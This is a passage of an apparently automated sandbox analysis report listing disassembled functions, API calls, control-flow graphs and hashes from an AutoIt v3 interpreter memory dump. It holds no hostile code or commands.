                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9229f5b36146f923c8562df1d6035bab5be2ca05b6e186958c1e4a776c7e24fa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 41618826255464dc0988d1d8bc0e549e7050baac3b322753651f4aba3ed9f2a9
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9229f5b36146f923c8562df1d6035bab5be2ca05b6e186958c1e4a776c7e24fa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE213E70E00358EFDF119F99FC89B99BFF8FB0A750F00405AE604A6260DBB945488F90
                                                                                                                                                                                                                                                                                                                            Function 00250FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 553 250fb8-250fef call 1de6a0 556 250ff1-250ffe call 1dc98d 553->556 557 25100f-251021 WSAStartup 553->557 556->557 565 251000-25100b call 1dc98d 556->565 559 251054-251091 call 1ec1f6 call 1d8ec0 call 1ef9d4 inet_addr gethostbyname 557->559 560 251023-251031 557->560 576 251093-2510a0 IcmpCreateFile 559->576 577 2510a2-2510b0 559->577 562 251036-251046 560->562 563 251033 560->563 566 251048 562->566 567 25104b-25104f 562->567 563->562 565->557 566->567 570 251249-251251 567->570 576->577 578 2510d3-251100 call 1f017b call 1d423c 576->578 579 2510b5-2510c5 577->579 580 2510b2 577->580 589 251102-251129 IcmpSendEcho 578->589 590 25112b-251148 IcmpSendEcho 578->590 581 2510c7 579->581 582 2510ca-2510ce 579->582 580->579 581->582 584 251240-251244 call 1dbd98 582->584 584->570 591 25114c-25114e 589->591 590->591 592 251150-251155 591->592 593 2511ae-2511bc 591->593 594 2511f8-25120a call 1de6a0 592->594 595 25115b-251160 592->595 596 2511c1-2511c8 593->596 597 2511be 593->597 611 251210 594->611 612 25120c-25120e 594->612 598 251162-251167 595->598 599 2511ca-2511d8 595->599 601 2511e4-2511ed 596->601 597->596 598->593 604 251169-25116e 598->604 606 2511dd 599->606 607 2511da 599->607 602 2511f2-2511f6 601->602 603 2511ef 601->603 608 251212-251229 IcmpCloseHandle WSACleanup 602->608 603->602 609 251170-251175 604->609 610 251193-2511a1 604->610 606->601 607->606 608->584 616 25122b-25123d call 1f013d call 1f0184 608->616 609->599 613 251177-251185 609->613 614 2511a6-2511ac 610->614 615 2511a3 610->615 611->608 612->608 617 251187 613->617 618 25118a-251191 613->618 614->601 615->614 616->584 617->618 618->601
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 00251019
                                                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 00251079
                                                                                                                                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 00251085
                                                                                                                                                                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00251093
                                                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00251123
                                                                                                                                                                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00251142
                                                                                                                                                                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00251216
                                                                                                                                                                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 0025121C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 87dddff215615edccfbfacb356a543c7e66f6402083d8bc07676f15b7dbea2dd
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fbb2792975167552fac8d2362badb71756ae86d44ebbe3a497b78c4c27216fd5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87dddff215615edccfbfacb356a543c7e66f6402083d8bc07676f15b7dbea2dd
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A491C0316146029FD720DF15C888F16BBE0AF48318F14C5A9F969CB7A2C771EDA9CB81
                                                                                                                                                                                                                                                                                                                            Function 001D2793 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D32AF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 001D32B7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D32C2
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D32CD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 001D32D5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 001D32DD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D3205: RegisterWindowMessageW.USER32(00000004,?,001D2964), ref: 001D325D
                                                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001D2A0A
                                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32 ref: 001D2A28
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00213A0D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                                                            • String ID: (&*$0$*$4'*$`K$d(*$$*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1986988660-3768657815
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f147d20b9c1a32a876de6940f4bd1f8bbac67c247ab04e34f509ea438cf6a02e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 20a27ce990b8b9abbc07beaca4005fa1c6d7e80d05d29e07b5a8cc993d96c515
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f147d20b9c1a32a876de6940f4bd1f8bbac67c247ab04e34f509ea438cf6a02e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 787175B0D26200CF878CEF6DB9AD6157BE4BB6A300390816AE419C7761EF7445898F64
                                                                                                                                                                                                                                                                                                                            Function 001DF6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.$t5*$t5*$t5*$t5*$t5*t5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 0-1239982784
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a09a7aead646c62b7ce0bc65e32d1a5b25a1cbdf0cef93d2e961a31bc8027084
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6bcf647172080781b89de8cca285b7eb478d2ad4608eafe48547cfc10b38eeff
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a09a7aead646c62b7ce0bc65e32d1a5b25a1cbdf0cef93d2e961a31bc8027084
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1C28C75E00619DFCB24DF98D880BADB7F1BF19300F25816AE906AB351D771AE52CB90
                                                                                                                                                                                                                                                                                                                            Function 001E0340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 001E15F2
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                            • String ID: t5*$t5*$t5*$t5*$t5*t5*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-3675582153
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e129a085a0c1f6cc01b9baeb9e745c1790b25ea7e2f452a262086d7488f416f7
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 29610ab66f270a1568d6a620776d6ee2153ad706527fb642e562f54576da41ce
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e129a085a0c1f6cc01b9baeb9e745c1790b25ea7e2f452a262086d7488f416f7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB29B74A08B81DFCB25CF19D480A2EB7E1BF99300F25495DE9898B351D7B1ED80CB92
                                                                                                                                                                                                                                                                                                                            Function 002090C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 1633 2090c5-2090d5 1634 2090d7-2090ea call 1ff636 call 1ff649 1633->1634 1635 2090ef-2090f1 1633->1635 1651 209471 1634->1651 1637 2090f7-2090fd 1635->1637 1638 209459-209466 call 1ff636 call 1ff649 1635->1638 1637->1638 1641 209103-20912e 1637->1641 1656 20946c call 202b5c 1638->1656 1641->1638 1644 209134-20913d 1641->1644 1647 209157-209159 1644->1647 1648 20913f-209152 call 1ff636 call 1ff649 1644->1648 1649 209455-209457 1647->1649 1650 20915f-209163 1647->1650 1648->1656 1655 209474-209479 1649->1655 1650->1649 1654 209169-20916d 1650->1654 1651->1655 1654->1648 1658 20916f-209186 1654->1658 1656->1651 1662 2091a3-2091ac 1658->1662 1663 209188-20918b 1658->1663 1666 2091ca-2091d4 1662->1666 1667 2091ae-2091c5 call 1ff636 call 1ff649 call 202b5c 1662->1667 1664 209195-20919e 1663->1664 1665 20918d-209193 1663->1665 1670 20923f-209259 1664->1670 1665->1664 1665->1667 1668 2091d6-2091d8 1666->1668 1669 2091db-2091dc call 203b93 1666->1669 1695 20938c 1667->1695 1668->1669 1677 2091e1-2091f9 call 202d38 * 2 1669->1677 1672 20932d-209336 call 20fc1b 1670->1672 1673 20925f-20926f 1670->1673 1686 209338-20934a 1672->1686 1687 2093a9 1672->1687 1673->1672 1676 209275-209277 1673->1676 1676->1672 1680 20927d-2092a3 1676->1680 1703 209216-20923c call 2097a4 1677->1703 1704 2091fb-209211 call 1ff649 call 1ff636 1677->1704 1680->1672 1684 2092a9-2092bc 1680->1684 1684->1672 1689 2092be-2092c0 1684->1689 1686->1687 1692 20934c-20935b GetConsoleMode 1686->1692 1691 2093ad-2093c5 ReadFile 1687->1691 1689->1672 1696 2092c2-2092ed 1689->1696 1698 209421-20942c GetLastError 1691->1698 1699 2093c7-2093cd 1691->1699 1692->1687 1694 20935d-209361 1692->1694 1694->1691 1700 209363-20937d ReadConsoleW 1694->1700 1701 20938f-209399 call 202d38 1695->1701 1696->1672 1702 2092ef-209302 1696->1702 1705 209445-209448 1698->1705 1706 20942e-209440 call 1ff649 call 1ff636 1698->1706 1699->1698 1707 2093cf 1699->1707 1708 20939e-2093a7 1700->1708 1709 20937f GetLastError 1700->1709 1701->1655 1702->1672 1713 209304-209306 1702->1713 1703->1670 1704->1695 1710 209385-20938b call 1ff613 1705->1710 1711 20944e-209450 1705->1711 1706->1695 1717 2093d2-2093e4 1707->1717 1708->1717 1709->1710 1710->1695 1711->1701 1713->1672 1722 209308-209328 1713->1722 1717->1701 1719 2093e6-2093ea 1717->1719 1726 209403-20940e 1719->1726 1727 2093ec-2093fc call 208de1 1719->1727 1722->1672 1732 209410 call 208f31 1726->1732 1733 20941a-20941f call 208c21 1726->1733 1738 2093ff-209401 1727->1738 1739 209415-209418 1732->1739 1733->1739 1738->1701 1739->1738
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: aacd6885fe114d5255824fa375f1b6a182ec36925814001cc4bcd5c9f654c0fb
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2b532c32a7cb1bfe714141b67e4a122578f8acb3e68ab6606c20a3fb1be5c2f8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aacd6885fe114d5255824fa375f1b6a182ec36925814001cc4bcd5c9f654c0fb
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46C1F270A1434AAFDF11DFA8D845BADBBB4AF0A310F044099E556A73D3C77089A2CF61
                                                                                                                                                                                                                                                                                                                            Function 001D35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 1777 1d35b3-1d3623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001D35E1
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001D3602
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D3616
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,001D3368,?), ref: 001D361F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 661a5428ba8cadc6112bd05f358e99263b98531232cfbd407b3e585d64663337
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 398775cd839a45b3876dd6f8c8a66d13a396ebb3ea693133f14ff888c40f8545
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 661a5428ba8cadc6112bd05f358e99263b98531232cfbd407b3e585d64663337
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF03A71A00298BBEB310B1B7C0CE372EBDD7CBF10F00005EB904A7160CAA91899DAB0
                                                                                                                                                                                                                                                                                                                            Function 001D61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00215287
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 001D6299
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5e7d997c3f420eca324bb9727d3ae4eb63b20ad9ccbd245e5b0d3263b60760a2
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 576ebf60a93abc64847904756b731bb9db682692abeefa27da6063c68b6cc52e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7d997c3f420eca324bb9727d3ae4eb63b20ad9ccbd245e5b0d3263b60760a2
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D41C671408304ABC714EB64EC85EEF77DCAFA9320F00456FF99582291EF749649C792
                                                                                                                                                                                                                                                                                                                            Function 00208A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                                            control_flow_graph 1829 208a2e-208a42 call 205737 1832 208a44-208a46 1829->1832 1833 208a48-208a50 1829->1833 1834 208a96-208ab6 call 2056a6 1832->1834 1835 208a52-208a59 1833->1835 1836 208a5b-208a5e 1833->1836 1844 208ac4 1834->1844 1845 208ab8-208ac2 call 1ff613 1834->1845 1835->1836 1838 208a66-208a7a call 205737 * 2 1835->1838 1839 208a60-208a64 1836->1839 1840 208a7c-208a8c call 205737 CloseHandle 1836->1840 1838->1832 1838->1840 1839->1838 1839->1840 1840->1832 1851 208a8e-208a94 GetLastError 1840->1851 1849 208ac6-208ac9 1844->1849 1845->1849 1851->1834
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,OV!,0020894C,?,00299CE8,0000000C,002089AB,?,OV!,?,0021564F), ref: 00208A84
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00208A8E
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00208AB9
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                                                            • String ID: OV!
                                                                                                                                                                                                                                                                                                                            • API String ID: 2583163307-605026659
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0b264e6ad98595de1d164179469e2c2d4470bbdd99318f7453529454fefb9c5f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 1753e3ec96e96764cb9c08c79563fa77ecaf6edb7edf413ab945d4ebec141c43
